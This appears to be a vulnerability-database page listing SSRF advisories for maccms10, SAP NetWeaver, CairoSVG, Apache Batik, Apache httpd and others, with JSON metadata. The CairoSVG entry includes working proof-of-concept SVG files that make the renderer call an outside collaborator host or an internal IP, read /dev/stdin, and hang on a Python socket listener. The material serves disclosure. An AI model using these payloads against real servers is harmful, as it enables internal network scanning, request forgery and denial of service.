CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4636 vulnerabilities reference this CWE, most recent first.
GHSA-RWCM-VVJ8-QGG5
Vulnerability from github – Published: 2025-03-29 00:31 – Updated: 2025-03-31 21:32maccms10 v2025.1000.4047 has a Server-Side Request Forgery (SSRF) vulnerability via Add Article.
{
"affected": [],
"aliases": [
"CVE-2025-28091"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-28T22:15:18Z",
"severity": "CRITICAL"
},
"details": "maccms10 v2025.1000.4047 has a Server-Side Request Forgery (SSRF) vulnerability via Add Article.",
"id": "GHSA-rwcm-vvj8-qgg5",
"modified": "2025-03-31T21:32:46Z",
"published": "2025-03-29T00:31:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-28091"
},
{
"type": "WEB",
"url": "https://www.yuque.com/morysummer/vx41bz/ax55rxv4u3our1ic"
},
{
"type": "WEB",
"url": "https://www.yuque.com/morysummer/vx41bz/xo5w1euakvtgenex"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RWJF-4F53-289H
Vulnerability from github – Published: 2022-05-24 19:14 – Updated: 2022-05-24 19:14The SAP NetWeaver Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, component Iviews Editor contains a Server-Side Request Forgery (SSRF) vulnerability which allows an unauthenticated attacker to craft a malicious URL which when clicked by a user can make any type of request (e.g. POST, GET) to any internal or external server. This can result in the accessing or modification of data accessible from the Portal but will not affect its availability.
{
"affected": [],
"aliases": [
"CVE-2021-33705"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-15T19:15:00Z",
"severity": "HIGH"
},
"details": "The SAP NetWeaver Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, component Iviews Editor contains a Server-Side Request Forgery (SSRF) vulnerability which allows an unauthenticated attacker to craft a malicious URL which when clicked by a user can make any type of request (e.g. POST, GET) to any internal or external server. This can result in the accessing or modification of data accessible from the Portal but will not affect its availability.",
"id": "GHSA-rwjf-4f53-289h",
"modified": "2022-05-24T19:14:34Z",
"published": "2022-05-24T19:14:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33705"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/3074844"
},
{
"type": "WEB",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165743/SAP-Enterprise-Portal-iviewCatcherEditor-Server-Side-Request-Forgery.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Jan/72"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-RWMF-W63J-P7GV
Vulnerability from github – Published: 2023-03-20 21:27 – Updated: 2024-11-18 16:26SSRF vulnerability
Summary
When CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
Tested CairoSVG version
2.6.0
Details
A specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization's internal resources or a DDOS attack on external resources. It looks like this bug can affect websites and cause request forgery on the server.
PoC
- Generating malicious svg file: 1.1 CairoSVG_exploit.svg:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<image height="200" width="200" xlink:href="http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3" />
<style type="text/css">@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5");</style>
<style type="text/css">
<![CDATA[
@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9");
rect { fill: red; stroke: blue; stroke-width: 3 }
]]>
</style>
</svg>
1.2 CairoSVG_exploit_2.svg:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
<pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450">
<image xlink:href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11" x="0" y="0" width="600" height="450" />
</pattern>
</defs>
<path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" />
</svg>
1.3 CairoSVG_exploit_3.svg:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13" />
</svg>
-
Run some commands:
$ python3 -m cairosvg CairoSVG_exploit.svg -f png$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png -
See result requests in Burp Collaborator:

DOS vulnerability with SSTI
Summary
When CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
Tested CairoSVG version
2.6.0
PoC
- Generating malicious svg file:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://192.168.56.1:1234/" />
</svg>
- In other server run this python program:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(2048)
s.close()
- Run commands:
$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png(without timeout server will hang forever)
DOS vulnerability with stdin file descriptor
Summary
Specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9
Tested CairoSVG version
2.6.0
PoC
- Generating malicious svg file:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="file:///dev/stdin" />
</svg>
- In other server run this python program:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(2048)
s.close()
- Run commands:
$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "CairoSVG"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-27586"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-20T21:27:15Z",
"nvd_published_at": "2023-03-20T16:15:00Z",
"severity": "HIGH"
},
"details": "# SSRF vulnerability\n\n## Summary\nWhen CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## Details\nA specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization\u0027s internal resources or a DDOS attack on external resources.\nIt looks like this bug can affect websites and cause request forgery on the server.\n\n## PoC\n1. Generating malicious svg file:\n1.1 CairoSVG_exploit.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cimage height=\"200\" width=\"200\" xlink:href=\"http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3\" /\u003e\n \u003cstyle type=\"text/css\"\u003e@import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5\");\u003c/style\u003e\n \u003cstyle type=\"text/css\"\u003e\n \u003c![CDATA[\n @import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9\");\n rect { fill: red; stroke: blue; stroke-width: 3 }\n ]]\u003e\n \u003c/style\u003e\n\u003c/svg\u003e\n```\n\n1.2 CairoSVG_exploit_2.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cdefs\u003e\n \u003cpattern id=\"img1\" patternUnits=\"userSpaceOnUse\" width=\"600\" height=\"450\"\u003e\n \u003cimage xlink:href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11\" x=\"0\" y=\"0\" width=\"600\" height=\"450\" /\u003e\n \u003c/pattern\u003e\n \u003c/defs\u003e\n \u003cpath d=\"M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z\" fill=\"url(#img1)\" /\u003e\n\u003c/svg\u003e\n```\n\n1.3 CairoSVG_exploit_3.svg:\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cuse href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13\" /\u003e\n\u003c/svg\u003e\n```\n\n2. Run some commands:\n`$ python3 -m cairosvg CairoSVG_exploit.svg -f png`\n`$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png`\n`$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png `\n\n3. See result requests in Burp Collaborator:\n\n\n\n\n# DOS vulnerability with SSTI\n\n## Summary\nWhen CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## PoC\n1. Generating malicious svg file:\n\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cuse href=\"http://192.168.56.1:1234/\" /\u003e\n\u003c/svg\u003e\n```\n\n2. In other server run this python program:\n\n```python\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((\u00270.0.0.0\u0027, 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n while True:\n data = conn.recv(2048)\ns.close()\n```\n\n3. Run commands:\n`$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png`\n(without timeout server will hang forever)\n\n\n# DOS vulnerability with stdin file descriptor\n\n## Summary\n\nSpecially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.\n\n## Operating system, version and so on\nLinux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9\n\n## Tested CairoSVG version\n2.6.0\n\n## PoC\n1. Generating malicious svg file:\n\n```svg\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n \u003c!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"\u003e\n \u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n \u003cuse href=\"file:///dev/stdin\" /\u003e\n\u003c/svg\u003e\n```\n\n2. In other server run this python program:\n```python\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((\u00270.0.0.0\u0027, 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n while True:\n data = conn.recv(2048)\ns.close()\n```\n\n3. Run commands:\n`$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png`",
"id": "GHSA-rwmf-w63j-p7gv",
"modified": "2024-11-18T16:26:29Z",
"published": "2023-03-20T21:27:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27586"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53"
},
{
"type": "PACKAGE",
"url": "https://github.com/Kozea/CairoSVG"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/cairosvg/PYSEC-2023-9.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:L",
"type": "CVSS_V4"
}
],
"summary": "CairoSVG improperly processes SVG files loaded from external resources"
}
GHSA-RWQR-M72Q-V6CM
Vulnerability from github – Published: 2022-10-25 19:00 – Updated: 2025-09-24 20:42A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.xmlgraphics:batik"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.16"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.xmlgraphics:batik-bridge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.16"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-42890"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2022-10-25T23:10:03Z",
"nvd_published_at": "2022-10-25T17:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16.",
"id": "GHSA-rwqr-m72q-v6cm",
"modified": "2025-09-24T20:42:40Z",
"published": "2022-10-25T19:00:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42890"
},
{
"type": "WEB",
"url": "https://github.com/apache/xmlgraphics-batik/commit/401aa8595f52d085d40ff5b6b4ac0dd372423082"
},
{
"type": "WEB",
"url": "https://github.com/apache/xmlgraphics-batik/commit/52f7a1ad6e3110ec295a35ffc94410eef085707a"
},
{
"type": "WEB",
"url": "https://github.com/apache/xmlgraphics-batik/commit/eada57c716a2757579d53017f8b2aeadaad20edd"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/BATIK-1345"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/pkvhy0nsj1h1mlon008wtzhosbtxjwly"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00038.html"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202401-11"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2022/dsa-5264"
},
{
"type": "WEB",
"url": "https://xmlgraphics.apache.org/security.html"
},
{
"type": "WEB",
"url": "http://svn.apache.org/repos/asf/xmlgraphics/batik/trunk"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/10/25/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Untrusted code execution in Apache XML Graphics Batik"
}
GHSA-RWXQ-58VM-3V2J
Vulnerability from github – Published: 2022-05-24 19:14 – Updated: 2025-10-22 00:32A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.
{
"affected": [],
"aliases": [
"CVE-2021-40438"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-16T15:15:00Z",
"severity": "CRITICAL"
},
"details": "A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.",
"id": "GHSA-rwxq-58vm-3v2j",
"modified": "2025-10-22T00:32:21Z",
"published": "2022-05-24T19:14:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40438"
},
{
"type": "WEB",
"url": "https://www.tenable.com/security/tns-2021-17"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-4982"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-40438"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-2.4.49-VWL69sWQ"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20211008-0004"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202208-20"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNCYSR3BXT36FFF4XTCPL3HDQK4VP45R"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPBR6WUYBJNACHKE65SPL7TJOHX7RHWD"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZNCYSR3BXT36FFF4XTCPL3HDQK4VP45R"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SPBR6WUYBJNACHKE65SPL7TJOHX7RHWD"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00001.html"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rf6954e60b1c8e480678ce3d02f61b8a788997785652e9557a3265c00@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rf6954e60b1c8e480678ce3d02f61b8a788997785652e9557a3265c00%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r82c077663f9759c7df5a6656f925b3ee4f55fcd33c889ba7cd687029@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r82c077663f9759c7df5a6656f925b3ee4f55fcd33c889ba7cd687029%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r82838efc5fa6fc4c73986399c9b71573589f78b31846aff5bd9b1697@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r82838efc5fa6fc4c73986399c9b71573589f78b31846aff5bd9b1697%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r61fdbfc26ab170f4e6492ef3bd5197c20b862ce156e9d5a54d4b899c@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r61fdbfc26ab170f4e6492ef3bd5197c20b862ce156e9d5a54d4b899c%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r3925e167d5eb1c75def3750c155d753064e1d34a143028bb32910432@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r3925e167d5eb1c75def3750c155d753064e1d34a143028bb32910432%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r2eb200ac1340f69aa22af61ab34780c531d110437910cb9c0ece3b37@%3Cbugs.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r2eb200ac1340f69aa22af61ab34780c531d110437910cb9c0ece3b37%40%3Cbugs.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a@%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a%40%3Cusers.httpd.apache.org%3E"
},
{
"type": "WEB",
"url": "https://httpd.apache.org/security/vulnerabilities_24.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RX3P-3V8J-HGW8
Vulnerability from github – Published: 2024-06-03 12:30 – Updated: 2024-06-03 12:30Server-Side Request Forgery (SSRF) vulnerability in WPManageNinja LLC Ninja Tables.This issue affects Ninja Tables: from n/a through 5.0.9.
{
"affected": [],
"aliases": [
"CVE-2024-35635"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-03T10:15:14Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in WPManageNinja LLC Ninja Tables.This issue affects Ninja Tables: from n/a through 5.0.9.",
"id": "GHSA-rx3p-3v8j-hgw8",
"modified": "2024-06-03T12:30:38Z",
"published": "2024-06-03T12:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35635"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/ninja-tables/wordpress-ninja-tables-plugin-5-0-9-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RX6V-R244-H59W
Vulnerability from github – Published: 2026-07-09 18:31 – Updated: 2026-07-09 18:31A security vulnerability has been detected in aerostackdev aerostack-mcp up to 6315dfde7df0a15aaf743f88d91347115e09ba23. Affected by this issue is the function upload_media of the component mcp-whatsapp. Such manipulation of the argument media_url leads to server-side request forgery. The attack may be launched remotely. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.
{
"affected": [],
"aliases": [
"CVE-2026-15189"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-09T16:16:38Z",
"severity": "MODERATE"
},
"details": "A security vulnerability has been detected in aerostackdev aerostack-mcp up to 6315dfde7df0a15aaf743f88d91347115e09ba23. Affected by this issue is the function upload_media of the component mcp-whatsapp. Such manipulation of the argument media_url leads to server-side request forgery. The attack may be launched remotely. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.",
"id": "GHSA-rx6v-r244-h59w",
"modified": "2026-07-09T18:31:51Z",
"published": "2026-07-09T18:31:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15189"
},
{
"type": "WEB",
"url": "https://github.com/aerostackdev/aerostack-mcp/issues/3"
},
{
"type": "WEB",
"url": "https://github.com/aerostackdev/aerostack-mcp"
},
{
"type": "WEB",
"url": "https://vuldb.com/cve/CVE-2026-15189"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/851437"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/377115"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/377115/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RX7C-6CWM-H95C
Vulnerability from github – Published: 2024-01-14 00:31 – Updated: 2024-01-14 00:31A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function http_post of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250652.
{
"affected": [],
"aliases": [
"CVE-2024-0510"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-13T22:15:45Z",
"severity": "HIGH"
},
"details": "A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function http_post of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250652.",
"id": "GHSA-rx7c-6cwm-h95c",
"modified": "2024-01-14T00:31:34Z",
"published": "2024-01-14T00:31:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0510"
},
{
"type": "WEB",
"url": "https://note.zhaoj.in/share/gBtNhBb39u9u"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.250652"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.250652"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/176547/HaoKeKeJi-YiQiNiu-Server-Side-Request-Forgery.html"
}
],
"schema_version": "1.4.0",
"severity": [
